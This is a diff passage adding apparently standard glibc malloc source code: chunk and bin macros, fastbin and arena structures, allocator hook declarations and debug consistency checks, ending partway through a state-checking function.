+/* The smallest possible chunk */
+#define MIN_CHUNK_SIZE        (offsetof(struct malloc_chunk, fd_nextsize))
+
+/* The smallest size we can malloc is an aligned minimal chunk */
+
+#define MINSIZE  \
+  (unsigned long)(((MIN_CHUNK_SIZE+MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK))
+
+/* Check if m has acceptable alignment */
+
+#define aligned_OK(m)  (((unsigned long)(m) & MALLOC_ALIGN_MASK) == 0)
+
+#define misaligned_chunk(p) \
+  ((uintptr_t)(MALLOC_ALIGNMENT == 2 * SIZE_SZ ? (p) : chunk2mem (p)) \
+   & MALLOC_ALIGN_MASK)
+
+/* pad request bytes into a usable size -- internal version */
+
+#define request2size(req)                                         \
+  (((req) + SIZE_SZ + MALLOC_ALIGN_MASK < MINSIZE)  ?             \
+   MINSIZE :                                                      \
+   ((req) + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK)
+
+/* Check if REQ overflows when padded and aligned and if the resulting value
+   is less than PTRDIFF_T.  Returns TRUE and the requested size or MINSIZE in
+   case the value is less than MINSIZE on SZ or false if any of the previous
+   check fail.  */
+static inline bool
+checked_request2size (size_t req, size_t *sz) __nonnull (1)
+{
+  if (__glibc_unlikely (req > PTRDIFF_MAX))
+    return false;
+  *sz = request2size (req);
+  return true;
+}
+
+/*
+   --------------- Physical chunk operations ---------------
+ */
+
+
+/* size field is or'ed with PREV_INUSE when previous adjacent chunk in use */
+#define PREV_INUSE 0x1
+
+/* extract inuse bit of previous chunk */
+#define prev_inuse(p)       ((p)->mchunk_size & PREV_INUSE)
+
+
+/* size field is or'ed with IS_MMAPPED if the chunk was obtained with mmap() */
+#define IS_MMAPPED 0x2
+
+/* check for mmap()'ed chunk */
+#define chunk_is_mmapped(p) ((p)->mchunk_size & IS_MMAPPED)
+
+
+/* size field is or'ed with NON_MAIN_ARENA if the chunk was obtained
+   from a non-main arena.  This is only set immediately before handing
+   the chunk to the user, if necessary.  */
+#define NON_MAIN_ARENA 0x4
+
+/* Check for chunk from main arena.  */
+#define chunk_main_arena(p) (((p)->mchunk_size & NON_MAIN_ARENA) == 0)
+
+/* Mark a chunk as not being on the main arena.  */
+#define set_non_main_arena(p) ((p)->mchunk_size |= NON_MAIN_ARENA)
+
+
+/*
+   Bits to mask off when extracting size
+
+   Note: IS_MMAPPED is intentionally not masked off from size field in
+   macros for which mmapped chunks should never be seen. This should
+   cause helpful core dumps to occur if it is tried by accident by
+   people extending or adapting this malloc.
+ */
+#define SIZE_BITS (PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)
+
+/* Get size, ignoring use bits */
+#define chunksize(p) (chunksize_nomask (p) & ~(SIZE_BITS))
+
+/* Like chunksize, but do not mask SIZE_BITS.  */
+#define chunksize_nomask(p)         ((p)->mchunk_size)
+
+/* Ptr to next physical malloc_chunk. */
+#define next_chunk(p) ((mchunkptr) (((char *) (p)) + chunksize (p)))
+
+/* Size of the chunk below P.  Only valid if !prev_inuse (P).  */
+#define prev_size(p) ((p)->mchunk_prev_size)
+
+/* Set the size of the chunk below P.  Only valid if !prev_inuse (P).  */
+#define set_prev_size(p, sz) ((p)->mchunk_prev_size = (sz))
+
+/* Ptr to previous physical malloc_chunk.  Only valid if !prev_inuse (P).  */
+#define prev_chunk(p) ((mchunkptr) (((char *) (p)) - prev_size (p)))
+
+/* Treat space at ptr + offset as a chunk */
+#define chunk_at_offset(p, s)  ((mchunkptr) (((char *) (p)) + (s)))
+
+/* extract p's inuse bit */
+#define inuse(p)							      \
+  ((((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size) & PREV_INUSE)
+
+/* set/clear chunk as being inuse without otherwise disturbing */
+#define set_inuse(p)							      \
+  ((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size |= PREV_INUSE
+
+#define clear_inuse(p)							      \
+  ((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size &= ~(PREV_INUSE)
+
+
+/* check/set/clear inuse bits in known places */
+#define inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size & PREV_INUSE)
+
+#define set_inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size |= PREV_INUSE)
+
+#define clear_inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size &= ~(PREV_INUSE))
+
+
+/* Set size at head, without disturbing its use bit */
+#define set_head_size(p, s)  ((p)->mchunk_size = (((p)->mchunk_size & SIZE_BITS) | (s)))
+
+/* Set size/use field */
+#define set_head(p, s)       ((p)->mchunk_size = (s))
+
+/* Set size at footer (only when chunk is not in use) */
+#define set_foot(p, s)       (((mchunkptr) ((char *) (p) + (s)))->mchunk_prev_size = (s))
+
+
+#pragma GCC poison mchunk_size
+#pragma GCC poison mchunk_prev_size
+
+/*
+   -------------------- Internal data structures --------------------
+
+   All internal state is held in an instance of malloc_state defined
+   below. There are no other static variables, except in two optional
+   cases:
+ * If USE_MALLOC_LOCK is defined, the mALLOC_MUTEx declared above.
+ * If mmap doesn't support MAP_ANONYMOUS, a dummy file descriptor
+     for mmap.
+
+   Beware of lots of tricks that minimize the total bookkeeping space
+   requirements. The result is a little over 1K bytes (for 4byte
+   pointers and size_t.)
+ */
+
+/*
+   Bins
+
+    An array of bin headers for free chunks. Each bin is doubly
+    linked.  The bins are approximately proportionally (log) spaced.
+    There are a lot of these bins (128). This may look excessive, but
+    works very well in practice.  Most bins hold sizes that are
+    unusual as malloc request sizes, but are more usual for fragments
+    and consolidated sets of chunks, which is what these bins hold, so
+    they can be found quickly.  All procedures maintain the invariant
+    that no consolidated chunk physically borders another one, so each
+    chunk in a list is known to be preceeded and followed by either
+    inuse chunks or the ends of memory.
+
+    Chunks in bins are kept in size order, with ties going to the
+    approximately least recently used chunk. Ordering isn't needed
+    for the small bins, which all contain the same-sized chunks, but
+    facilitates best-fit allocation for larger chunks. These lists
+    are just sequential. Keeping them in order almost never requires
+    enough traversal to warrant using fancier ordered data
+    structures.
+
+    Chunks of the same size are linked with the most
+    recently freed at the front, and allocations are taken from the
+    back.  This results in LRU (FIFO) allocation order, which tends
+    to give each chunk an equal opportunity to be consolidated with
+    adjacent freed chunks, resulting in larger free chunks and less
+    fragmentation.
+
+    To simplify use in double-linked lists, each bin header acts
+    as a malloc_chunk. This avoids special-casing for headers.
+    But to conserve space and improve locality, we allocate
+    only the fd/bk pointers of bins, and then use repositioning tricks
+    to treat these as the fields of a malloc_chunk*.
+ */
+
+typedef struct malloc_chunk *mbinptr;
+
+/* addressing -- note that bin_at(0) does not exist */
+#define bin_at(m, i) \
+  (mbinptr) (((char *) &((m)->bins[((i) - 1) * 2]))			      \
+             - offsetof (struct malloc_chunk, fd))
+
+/* analog of ++bin */
+#define next_bin(b)  ((mbinptr) ((char *) (b) + (sizeof (mchunkptr) << 1)))
+
+/* Reminders about list directionality within bins */
+#define first(b)     ((b)->fd)
+#define last(b)      ((b)->bk)
+
+/*
+   Indexing
+
+    Bins for sizes < 512 bytes contain chunks of all the same size, spaced
+    8 bytes apart. Larger bins are approximately logarithmically spaced:
+
+    64 bins of size       8
+    32 bins of size      64
+    16 bins of size     512
+     8 bins of size    4096
+     4 bins of size   32768
+     2 bins of size  262144
+     1 bin  of size what's left
+
+    There is actually a little bit of slop in the numbers in bin_index
+    for the sake of speed. This makes no difference elsewhere.
+
+    The bins top out around 1MB because we expect to service large
+    requests via mmap.
+
+    Bin 0 does not exist.  Bin 1 is the unordered list; if that would be
+    a valid chunk size the small bins are bumped up one.
+ */
+
+#define NBINS             128
+#define NSMALLBINS         64
+#define SMALLBIN_WIDTH    MALLOC_ALIGNMENT
+#define SMALLBIN_CORRECTION (MALLOC_ALIGNMENT > 2 * SIZE_SZ)
+#define MIN_LARGE_SIZE    ((NSMALLBINS - SMALLBIN_CORRECTION) * SMALLBIN_WIDTH)
+
+#define in_smallbin_range(sz)  \
+  ((unsigned long) (sz) < (unsigned long) MIN_LARGE_SIZE)
+
+#define smallbin_index(sz) \
+  ((SMALLBIN_WIDTH == 16 ? (((unsigned) (sz)) >> 4) : (((unsigned) (sz)) >> 3))\
+   + SMALLBIN_CORRECTION)
+
+#define largebin_index_32(sz)                                                \
+  (((((unsigned long) (sz)) >> 6) <= 38) ?  56 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+#define largebin_index_32_big(sz)                                            \
+  (((((unsigned long) (sz)) >> 6) <= 45) ?  49 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+// XXX It remains to be seen whether it is good to keep the widths of
+// XXX the buckets the same or whether it should be scaled by a factor
+// XXX of two as well.
+#define largebin_index_64(sz)                                                \
+  (((((unsigned long) (sz)) >> 6) <= 48) ?  48 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+#define largebin_index(sz) \
+  (SIZE_SZ == 8 ? largebin_index_64 (sz)                                     \
+   : MALLOC_ALIGNMENT == 16 ? largebin_index_32_big (sz)                     \
+   : largebin_index_32 (sz))
+
+#define bin_index(sz) \
+  ((in_smallbin_range (sz)) ? smallbin_index (sz) : largebin_index (sz))
+
+/* Take a chunk off a bin list.  */
+static void
+unlink_chunk (mstate av, mchunkptr p)
+{
+  if (chunksize (p) != prev_size (next_chunk (p)))
+    malloc_printerr ("corrupted size vs. prev_size");
+
+  mchunkptr fd = p->fd;
+  mchunkptr bk = p->bk;
+
+  if (__builtin_expect (fd->bk != p || bk->fd != p, 0))
+    malloc_printerr ("corrupted double-linked list");
+
+  fd->bk = bk;
+  bk->fd = fd;
+  if (!in_smallbin_range (chunksize_nomask (p)) && p->fd_nextsize != NULL)
+    {
+      if (p->fd_nextsize->bk_nextsize != p
+	  || p->bk_nextsize->fd_nextsize != p)
+	malloc_printerr ("corrupted double-linked list (not small)");
+
+      if (fd->fd_nextsize == NULL)
+	{
+	  if (p->fd_nextsize == p)
+	    fd->fd_nextsize = fd->bk_nextsize = fd;
+	  else
+	    {
+	      fd->fd_nextsize = p->fd_nextsize;
+	      fd->bk_nextsize = p->bk_nextsize;
+	      p->fd_nextsize->bk_nextsize = fd;
+	      p->bk_nextsize->fd_nextsize = fd;
+	    }
+	}
+      else
+	{
+	  p->fd_nextsize->bk_nextsize = p->bk_nextsize;
+	  p->bk_nextsize->fd_nextsize = p->fd_nextsize;
+	}
+    }
+}
+
+/*
+   Unsorted chunks
+
+    All remainders from chunk splits, as well as all returned chunks,
+    are first placed in the "unsorted" bin. They are then placed
+    in regular bins after malloc gives them ONE chance to be used before
+    binning. So, basically, the unsorted_chunks list acts as a queue,
+    with chunks being placed on it in free (and malloc_consolidate),
+    and taken off (to be either used or placed in bins) in malloc.
+
+    The NON_MAIN_ARENA flag is never set for unsorted chunks, so it
+    does not have to be taken into account in size comparisons.
+ */
+
+/* The otherwise unindexable 1-bin is used to hold unsorted chunks. */
+#define unsorted_chunks(M)          (bin_at (M, 1))
+
+/*
+   Top
+
+    The top-most available chunk (i.e., the one bordering the end of
+    available memory) is treated specially. It is never included in
+    any bin, is used only if no other chunk is available, and is
+    released back to the system if it is very large (see
+    M_TRIM_THRESHOLD).  Because top initially
+    points to its own bin with initial zero size, thus forcing
+    extension on the first malloc request, we avoid having any special
+    code in malloc to check whether it even exists yet. But we still
+    need to do so when getting memory from system, so we make
+    initial_top treat the bin as a legal but unusable chunk during the
+    interval between initialization and the first call to
+    sysmalloc. (This is somewhat delicate, since it relies on
+    the 2 preceding words to be zero during this interval as well.)
+ */
+
+/* Conveniently, the unsorted bin can be used as dummy top on first call */
+#define initial_top(M)              (unsorted_chunks (M))
+
+/*
+   Binmap
+
+    To help compensate for the large number of bins, a one-level index
+    structure is used for bin-by-bin searching.  `binmap' is a
+    bitvector recording whether bins are definitely empty so they can
+    be skipped over during during traversals.  The bits are NOT always
+    cleared as soon as bins are empty, but instead only
+    when they are noticed to be empty during traversal in malloc.
+ */
+
+/* Conservatively use 32 bits per map word, even if on 64bit system */
+#define BINMAPSHIFT      5
+#define BITSPERMAP       (1U << BINMAPSHIFT)
+#define BINMAPSIZE       (NBINS / BITSPERMAP)
+
+#define idx2block(i)     ((i) >> BINMAPSHIFT)
+#define idx2bit(i)       ((1U << ((i) & ((1U << BINMAPSHIFT) - 1))))
+
+#define mark_bin(m, i)    ((m)->binmap[idx2block (i)] |= idx2bit (i))
+#define unmark_bin(m, i)  ((m)->binmap[idx2block (i)] &= ~(idx2bit (i)))
+#define get_binmap(m, i)  ((m)->binmap[idx2block (i)] & idx2bit (i))
+
+/*
+   Fastbins
+
+    An array of lists holding recently freed small chunks.  Fastbins
+    are not doubly linked.  It is faster to single-link them, and
+    since chunks are never removed from the middles of these lists,
+    double linking is not necessary. Also, unlike regular bins, they
+    are not even processed in FIFO order (they use faster LIFO) since
+    ordering doesn't much matter in the transient contexts in which
+    fastbins are normally used.
+
+    Chunks in fastbins keep their inuse bit set, so they cannot
+    be consolidated with other free chunks. malloc_consolidate
+    releases all chunks in fastbins and consolidates them with
+    other free chunks.
+ */
+
+typedef struct malloc_chunk *mfastbinptr;
+#define fastbin(ar_ptr, idx) ((ar_ptr)->fastbinsY[idx])
+
+/* offset 2 to use otherwise unindexable first 2 bins */
+#define fastbin_index(sz) \
+  ((((unsigned int) (sz)) >> (SIZE_SZ == 8 ? 4 : 3)) - 2)
+
+
+/* The maximum fastbin request size we support */
+#define MAX_FAST_SIZE     (80 * SIZE_SZ / 4)
+
+#define NFASTBINS  (fastbin_index (request2size (MAX_FAST_SIZE)) + 1)
+
+/*
+   FASTBIN_CONSOLIDATION_THRESHOLD is the size of a chunk in free()
+   that triggers automatic consolidation of possibly-surrounding
+   fastbin chunks. This is a heuristic, so the exact value should not
+   matter too much. It is defined at half the default trim threshold as a
+   compromise heuristic to only attempt consolidation if it is likely
+   to lead to trimming. However, it is not dynamically tunable, since
+   consolidation reduces fragmentation surrounding large chunks even
+   if trimming is not used.
+ */
+
+#define FASTBIN_CONSOLIDATION_THRESHOLD  (65536UL)
+
+/*
+   NONCONTIGUOUS_BIT indicates that MORECORE does not return contiguous
+   regions.  Otherwise, contiguity is exploited in merging together,
+   when possible, results from consecutive MORECORE calls.
+
+   The initial value comes from MORECORE_CONTIGUOUS, but is
+   changed dynamically if mmap is ever used as an sbrk substitute.
+ */
+
+#define NONCONTIGUOUS_BIT     (2U)
+
+#define contiguous(M)          (((M)->flags & NONCONTIGUOUS_BIT) == 0)
+#define noncontiguous(M)       (((M)->flags & NONCONTIGUOUS_BIT) != 0)
+#define set_noncontiguous(M)   ((M)->flags |= NONCONTIGUOUS_BIT)
+#define set_contiguous(M)      ((M)->flags &= ~NONCONTIGUOUS_BIT)
+
+/* Maximum size of memory handled in fastbins.  */
+static INTERNAL_SIZE_T global_max_fast;
+
+/*
+   Set value of max_fast.
+   Use impossibly small value if 0.
+   Precondition: there are no existing fastbin chunks in the main arena.
+   Since do_check_malloc_state () checks this, we call malloc_consolidate ()
+   before changing max_fast.  Note other arenas will leak their fast bin
+   entries if max_fast is reduced.
+ */
+
+#define set_max_fast(s) \
+  global_max_fast = (((s) == 0)						      \
+                     ? MIN_CHUNK_SIZE / 2 : ((s + SIZE_SZ) & ~MALLOC_ALIGN_MASK))
+
+static inline INTERNAL_SIZE_T
+get_max_fast (void)
+{
+  /* Tell the GCC optimizers that global_max_fast is never larger
+     than MAX_FAST_SIZE.  This avoids out-of-bounds array accesses in
+     _int_malloc after constant propagation of the size parameter.
+     (The code never executes because malloc preserves the
+     global_max_fast invariant, but the optimizers may not recognize
+     this.)  */
+  if (global_max_fast > MAX_FAST_SIZE)
+    __builtin_unreachable ();
+  return global_max_fast;
+}
+
+/*
+   ----------- Internal state representation and initialization -----------
+ */
+
+/*
+   have_fastchunks indicates that there are probably some fastbin chunks.
+   It is set true on entering a chunk into any fastbin, and cleared early in
+   malloc_consolidate.  The value is approximate since it may be set when there
+   are no fastbin chunks, or it may be clear even if there are fastbin chunks
+   available.  Given it's sole purpose is to reduce number of redundant calls to
+   malloc_consolidate, it does not affect correctness.  As a result we can safely
+   use relaxed atomic accesses.
+ */
+
+
+struct malloc_state
+{
+  /* Serialize access.  */
+  __libc_lock_define (, mutex);
+
+  /* Flags (formerly in max_fast).  */
+  int flags;
+
+  /* Set if the fastbin chunks contain recently inserted free blocks.  */
+  /* Note this is a bool but not all targets support atomics on booleans.  */
+  int have_fastchunks;
+
+  /* Fastbins */
+  mfastbinptr fastbinsY[NFASTBINS];
+
+  /* Base of the topmost chunk -- not otherwise kept in a bin */
+  mchunkptr top;
+
+  /* The remainder from the most recent split of a small request */
+  mchunkptr last_remainder;
+
+  /* Normal bins packed as described above */
+  mchunkptr bins[NBINS * 2 - 2];
+
+  /* Bitmap of bins */
+  unsigned int binmap[BINMAPSIZE];
+
+  /* Linked list */
+  struct malloc_state *next;
+
+  /* Linked list for free arenas.  Access to this field is serialized
+     by free_list_lock in arena.c.  */
+  struct malloc_state *next_free;
+
+  /* Number of threads attached to this arena.  0 if the arena is on
+     the free list.  Access to this field is serialized by
+     free_list_lock in arena.c.  */
+  INTERNAL_SIZE_T attached_threads;
+
+  /* Memory allocated from the system in this arena.  */
+  INTERNAL_SIZE_T system_mem;
+  INTERNAL_SIZE_T max_system_mem;
+};
+
+struct malloc_par
+{
+  /* Tunable parameters */
+  unsigned long trim_threshold;
+  INTERNAL_SIZE_T top_pad;
+  INTERNAL_SIZE_T mmap_threshold;
+  INTERNAL_SIZE_T arena_test;
+  INTERNAL_SIZE_T arena_max;
+
+  /* Memory map support */
+  int n_mmaps;
+  int n_mmaps_max;
+  int max_n_mmaps;
+  /* the mmap_threshold is dynamic, until the user sets
+     it manually, at which point we need to disable any
+     dynamic behavior. */
+  int no_dyn_threshold;
+
+  /* Statistics */
+  INTERNAL_SIZE_T mmapped_mem;
+  INTERNAL_SIZE_T max_mmapped_mem;
+
+  /* First address handed out by MORECORE/sbrk.  */
+  char *sbrk_base;
+
+#if USE_TCACHE
+  /* Maximum number of buckets to use.  */
+  size_t tcache_bins;
+  size_t tcache_max_bytes;
+  /* Maximum number of chunks in each bucket.  */
+  size_t tcache_count;
+  /* Maximum number of chunks to remove from the unsorted list, which
+     aren't used to prefill the cache.  */
+  size_t tcache_unsorted_limit;
+#endif
+};
+
+/* There are several instances of this struct ("arenas") in this
+   malloc.  If you are adapting this malloc in a way that does NOT use
+   a static or mmapped malloc_state, you MUST explicitly zero-fill it
+   before using. This malloc relies on the property that malloc_state
+   is initialized to all zeroes (as is true of C statics).  */
+
+static struct malloc_state main_arena =
+{
+  .mutex = _LIBC_LOCK_INITIALIZER,
+  .next = &main_arena,
+  .attached_threads = 1
+};
+
+/* These variables are used for undumping support.  Chunked are marked
+   as using mmap, but we leave them alone if they fall into this
+   range.  NB: The chunk size for these chunks only includes the
+   initial size field (of SIZE_SZ bytes), there is no trailing size
+   field (unlike with regular mmapped chunks).  */
+static mchunkptr dumped_main_arena_start; /* Inclusive.  */
+static mchunkptr dumped_main_arena_end;   /* Exclusive.  */
+
+/* True if the pointer falls into the dumped arena.  Use this after
+   chunk_is_mmapped indicates a chunk is mmapped.  */
+#define DUMPED_MAIN_ARENA_CHUNK(p) \
+  ((p) >= dumped_main_arena_start && (p) < dumped_main_arena_end)
+
+/* There is only one instance of the malloc parameters.  */
+
+static struct malloc_par mp_ =
+{
+  .top_pad = DEFAULT_TOP_PAD,
+  .n_mmaps_max = DEFAULT_MMAP_MAX,
+  .mmap_threshold = DEFAULT_MMAP_THRESHOLD,
+  .trim_threshold = DEFAULT_TRIM_THRESHOLD,
+#define NARENAS_FROM_NCORES(n) ((n) * (sizeof (long) == 4 ? 2 : 8))
+  .arena_test = NARENAS_FROM_NCORES (1)
+#if USE_TCACHE
+  ,
+  .tcache_count = TCACHE_FILL_COUNT,
+  .tcache_bins = TCACHE_MAX_BINS,
+  .tcache_max_bytes = tidx2usize (TCACHE_MAX_BINS-1),
+  .tcache_unsorted_limit = 0 /* No limit.  */
+#endif
+};
+
+/*
+   Initialize a malloc_state struct.
+
+   This is called from ptmalloc_init () or from _int_new_arena ()
+   when creating a new arena.
+ */
+
+static void
+malloc_init_state (mstate av)
+{
+  int i;
+  mbinptr bin;
+
+  /* Establish circular links for normal bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      bin = bin_at (av, i);
+      bin->fd = bin->bk = bin;
+    }
+
+#if MORECORE_CONTIGUOUS
+  if (av != &main_arena)
+#endif
+  set_noncontiguous (av);
+  if (av == &main_arena)
+    set_max_fast (DEFAULT_MXFAST);
+  atomic_store_relaxed (&av->have_fastchunks, false);
+
+  av->top = initial_top (av);
+}
+
+/*
+   Other internal utilities operating on mstates
+ */
+
+static void *sysmalloc (INTERNAL_SIZE_T, mstate);
+static int      systrim (size_t, mstate);
+static void     malloc_consolidate (mstate);
+
+
+/* -------------- Early definitions for debugging hooks ---------------- */
+
+/* Define and initialize the hook variables.  These weak definitions must
+   appear before any use of the variables in a function (arena.c uses one).  */
+#ifndef weak_variable
+/* In GNU libc we want the hook variables to be weak definitions to
+   avoid a problem with Emacs.  */
+# define weak_variable weak_function
+#endif
+
+/* Forward declarations.  */
+static void *malloc_hook_ini (size_t sz,
+                              const void *caller) __THROW;
+static void *realloc_hook_ini (void *ptr, size_t sz,
+                               const void *caller) __THROW;
+static void *memalign_hook_ini (size_t alignment, size_t sz,
+                                const void *caller) __THROW;
+
+#if HAVE_MALLOC_INIT_HOOK
+void weak_variable (*__malloc_initialize_hook) (void) = NULL;
+compat_symbol (libc, __malloc_initialize_hook,
+	       __malloc_initialize_hook, GLIBC_2_0);
+#endif
+
+void weak_variable (*__free_hook) (void *__ptr,
+                                   const void *) = NULL;
+void *weak_variable (*__malloc_hook)
+  (size_t __size, const void *) = malloc_hook_ini;
+void *weak_variable (*__realloc_hook)
+  (void *__ptr, size_t __size, const void *)
+  = realloc_hook_ini;
+void *weak_variable (*__memalign_hook)
+  (size_t __alignment, size_t __size, const void *)
+  = memalign_hook_ini;
+void weak_variable (*__after_morecore_hook) (void) = NULL;
+
+/* This function is called from the arena shutdown hook, to free the
+   thread cache (if it exists).  */
+static void tcache_thread_shutdown (void);
+
+/* ------------------ Testing support ----------------------------------*/
+
+static int perturb_byte;
+
+static void
+alloc_perturb (char *p, size_t n)
+{
+  if (__glibc_unlikely (perturb_byte))
+    memset (p, perturb_byte ^ 0xff, n);
+}
+
+static void
+free_perturb (char *p, size_t n)
+{
+  if (__glibc_unlikely (perturb_byte))
+    memset (p, perturb_byte, n);
+}
+
+
+
+#include <stap-probe.h>
+
+/* ------------------- Support for multiple arenas -------------------- */
+#include "arena.c"
+
+/*
+   Debugging support
+
+   These routines make a number of assertions about the states
+   of data structures that should be true at all times. If any
+   are not true, it's very likely that a user program has somehow
+   trashed memory. (It's also possible that there is a coding error
+   in malloc. In which case, please report it!)
+ */
+
+#if !MALLOC_DEBUG
+
+# define check_chunk(A, P)
+# define check_free_chunk(A, P)
+# define check_inuse_chunk(A, P)
+# define check_remalloced_chunk(A, P, N)
+# define check_malloced_chunk(A, P, N)
+# define check_malloc_state(A)
+
+#else
+
+# define check_chunk(A, P)              do_check_chunk (A, P)
+# define check_free_chunk(A, P)         do_check_free_chunk (A, P)
+# define check_inuse_chunk(A, P)        do_check_inuse_chunk (A, P)
+# define check_remalloced_chunk(A, P, N) do_check_remalloced_chunk (A, P, N)
+# define check_malloced_chunk(A, P, N)   do_check_malloced_chunk (A, P, N)
+# define check_malloc_state(A)         do_check_malloc_state (A)
+
+/*
+   Properties of all chunks
+ */
+
+static void
+do_check_chunk (mstate av, mchunkptr p)
+{
+  unsigned long sz = chunksize (p);
+  /* min and max possible addresses assuming contiguous allocation */
+  char *max_address = (char *) (av->top) + chunksize (av->top);
+  char *min_address = max_address - av->system_mem;
+
+  if (!chunk_is_mmapped (p))
+    {
+      /* Has legal address ... */
+      if (p != av->top)
+        {
+          if (contiguous (av))
+            {
+              assert (((char *) p) >= min_address);
+              assert (((char *) p + sz) <= ((char *) (av->top)));
+            }
+        }
+      else
+        {
+          /* top size is always at least MINSIZE */
+          assert ((unsigned long) (sz) >= MINSIZE);
+          /* top predecessor always marked inuse */
+          assert (prev_inuse (p));
+        }
+    }
+  else if (!DUMPED_MAIN_ARENA_CHUNK (p))
+    {
+      /* address is outside main heap  */
+      if (contiguous (av) && av->top != initial_top (av))
+        {
+          assert (((char *) p) < min_address || ((char *) p) >= max_address);
+        }
+      /* chunk is page-aligned */
+      assert (((prev_size (p) + sz) & (GLRO (dl_pagesize) - 1)) == 0);
+      /* mem is aligned */
+      assert (aligned_OK (chunk2mem (p)));
+    }
+}
+
+/*
+   Properties of free chunks
+ */
+
+static void
+do_check_free_chunk (mstate av, mchunkptr p)
+{
+  INTERNAL_SIZE_T sz = chunksize_nomask (p) & ~(PREV_INUSE | NON_MAIN_ARENA);
+  mchunkptr next = chunk_at_offset (p, sz);
+
+  do_check_chunk (av, p);
+
+  /* Chunk must claim to be free ... */
+  assert (!inuse (p));
+  assert (!chunk_is_mmapped (p));
+
+  /* Unless a special marker, must have OK fields */
+  if ((unsigned long) (sz) >= MINSIZE)
+    {
+      assert ((sz & MALLOC_ALIGN_MASK) == 0);
+      assert (aligned_OK (chunk2mem (p)));
+      /* ... matching footer field */
+      assert (prev_size (next_chunk (p)) == sz);
+      /* ... and is fully consolidated */
+      assert (prev_inuse (p));
+      assert (next == av->top || inuse (next));
+
+      /* ... and has minimally sane links */
+      assert (p->fd->bk == p);
+      assert (p->bk->fd == p);
+    }
+  else /* markers are always of size SIZE_SZ */
+    assert (sz == SIZE_SZ);
+}
+
+/*
+   Properties of inuse chunks
+ */
+
+static void
+do_check_inuse_chunk (mstate av, mchunkptr p)
+{
+  mchunkptr next;
+
+  do_check_chunk (av, p);
+
+  if (chunk_is_mmapped (p))
+    return; /* mmapped chunks have no next/prev */
+
+  /* Check whether it claims to be in use ... */
+  assert (inuse (p));
+
+  next = next_chunk (p);
+
+  /* ... and is surrounded by OK chunks.
+     Since more things can be checked with free chunks than inuse ones,
+     if an inuse chunk borders them and debug is on, it's worth doing them.
+   */
+  if (!prev_inuse (p))
+    {
+      /* Note that we cannot even look at prev unless it is not inuse */
+      mchunkptr prv = prev_chunk (p);
+      assert (next_chunk (prv) == p);
+      do_check_free_chunk (av, prv);
+    }
+
+  if (next == av->top)
+    {
+      assert (prev_inuse (next));
+      assert (chunksize (next) >= MINSIZE);
+    }
+  else if (!inuse (next))
+    do_check_free_chunk (av, next);
+}
+
+/*
+   Properties of chunks recycled from fastbins
+ */
+
+static void
+do_check_remalloced_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T s)
+{
+  INTERNAL_SIZE_T sz = chunksize_nomask (p) & ~(PREV_INUSE | NON_MAIN_ARENA);
+
+  if (!chunk_is_mmapped (p))
+    {
+      assert (av == arena_for_chunk (p));
+      if (chunk_main_arena (p))
+        assert (av == &main_arena);
+      else
+        assert (av != &main_arena);
+    }
+
+  do_check_inuse_chunk (av, p);
+
+  /* Legal size ... */
+  assert ((sz & MALLOC_ALIGN_MASK) == 0);
+  assert ((unsigned long) (sz) >= MINSIZE);
+  /* ... and alignment */
+  assert (aligned_OK (chunk2mem (p)));
+  /* chunk is less than MINSIZE more than request */
+  assert ((long) (sz) - (long) (s) >= 0);
+  assert ((long) (sz) - (long) (s + MINSIZE) < 0);
+}
+
+/*
+   Properties of nonrecycled chunks at the point they are malloced
+ */
+
+static void
+do_check_malloced_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T s)
+{
+  /* same as recycled case ... */
+  do_check_remalloced_chunk (av, p, s);
+
+  /*
+     ... plus,  must obey implementation invariant that prev_inuse is
+     always true of any allocated chunk; i.e., that each allocated
+     chunk borders either a previously allocated and still in-use
+     chunk, or the base of its memory arena. This is ensured
+     by making all allocations from the `lowest' part of any found
+     chunk.  This does not necessarily hold however for chunks
+     recycled via fastbins.
+   */
+
+  assert (prev_inuse (p));
+}
+
+
+/*
+   Properties of malloc_state.
+
+   This may be useful for debugging malloc, as well as detecting user
+   programmer errors that somehow write into malloc_state.
+
+   If you are extending or experimenting with this malloc, you can
+   probably figure out how to hack this routine to print out or
+   display chunk addresses, sizes, bins, and other instrumentation.
+ */
+
+static void
+do_check_malloc_state (mstate av)
+{
+  int i;
+  mchunkptr p;
+  mchunkptr q;
+  mbinptr b;
+  unsigned int idx;
+  INTERNAL_SIZE_T size;
+  unsigned long total = 0;
